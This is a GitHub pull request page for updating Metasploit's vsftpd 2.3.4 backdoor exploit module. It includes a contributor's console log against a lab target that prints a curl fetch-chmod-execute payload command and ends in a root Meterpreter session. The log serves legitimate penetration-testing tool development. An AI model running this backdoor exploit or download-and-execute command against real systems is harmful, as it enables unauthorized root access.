vsftpd_234_backdoor: Port to FTP mixin#21377
Open
g0tmi1k wants to merge 6 commits into
Open
Conversation
ed17bda to
84ff0f0
Compare
1909a6f to
f568fb6
Compare
Contributor
There was a problem hiding this comment.
Pull request overview
This PR updates the vsftpd_234_backdoor exploit module to improve reliability when the backdoor listener (6200/TCP) is already present, refine banner handling/logging, and modernize module metadata notes.
Changes:
- Adds FTP banner normalization and additional service/note reporting for banners.
- Adjusts
check/exploitflow to better handle cases where 6200/TCP is already open (attempt existing shell, then re-exploit). - Updates module
Notesmetadata (reliability/stability/side effects) and tweaks wording.
Impact Analysis: isolated change; no meaningful downstream impact identified from diff.
dledda-r7
reviewed
May 7, 2026
05b6faf to
f174ad5
Compare
Contributor
Author
|
Thanks for the review @dledda-r7 - I believe everything has been addressed? $ ./msfconsole -q -x 'db_status; workspace -D;
setg VERBOSE true; setg RHOSTS 10.0.0.10; setg LHOST tap0; use vsftpd_234_backdoor; run'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
RHOSTS => 10.0.0.10
LHOST => tap0
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent Yes VSFTPD 2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
[*] Using exploit/unix/ftp/vsftpd_234_backdoor
[*] Using configured payload cmd/linux/http/x86/meterpreter_reverse_tcp
[*] Command to run on remote host: curl -so ./oFNSiDlsu http://10.0.0.1:8080/w5F5mvQl1V5uSRj-6oaPrQ;chmod +x ./oFNSiDlsu;./oFNSiDlsu&
[*] Fetch handler listening on 10.0.0.1:8080
[*] HTTP server started
[*] Adding resource /w5F5mvQl1V5uSRj-6oaPrQ
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.10:21 - Running automatic check ("set AutoCheck false" to disable)
[*] 10.0.0.10:21 - Checking if backdoor has already been triggered (else exploit will fail)
[*] 10.0.0.10:21 - Connecting to FTP service
[*] 10.0.0.10:21 - Checking FTP banner
[*] 10.0.0.10:21 - FTP banner: 2.3.4
[*] 10.0.0.10:21 - FTP banner hints it's vulnerable
[*] 10.0.0.10:21 - Trying to log into FTP (User: r3jye1)
[+] 10.0.0.10:21 - The target appears to be vulnerable. vsftpd 2.3.4 banner detected; backdoor may be present
[*] 10.0.0.10:21 - Connecting to FTP service
[*] 10.0.0.10:21 - Checking FTP banner
[*] 10.0.0.10:21 - FTP banner: 2.3.4
[*] 10.0.0.10:21 - Trying to log into FTP via backdoor. User: gh7l1:)
[*] 10.0.0.10:21 - 331 Please specify the password.
[*] 10.0.0.10:21 - Trying to log into FTP via backdoor. Password: ESS
[*] 10.0.0.10:21 - Connecting to backdoor on 6200/TCP
[+] 10.0.0.10:21 - Backdoor has been spawned!
[*] 10.0.0.10:21 - Trying 'id' command
[+] 10.0.0.10:21 - UID: uid=0(root) gid=0(root)
[*] 10.0.0.10:21 - Running: curl -so ./oFNSiDlsu http://10.0.0.1:8080/w5F5mvQl1V5uSRj-6oaPrQ;chmod +x ./oFNSiDlsu;./oFNSiDlsu&
[*] Client 10.0.0.10 requested /w5F5mvQl1V5uSRj-6oaPrQ
[*] Sending payload to 10.0.0.10 (curl/7.18.0 (i486-pc-linux-gnu) libcurl/7.18.0 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.1)
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:36314) at 2026-05-08 04:24:41 +0100
meterpreter > |
f174ad5 to
b09ac50
Compare
1a81bb9 to
f516c32
Compare
a183755 to
01d33b5
Compare
Contributor
Author
01d33b5 to
1d929f1
Compare
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
This PR is for:
Target is metasploitable 2.
Before
After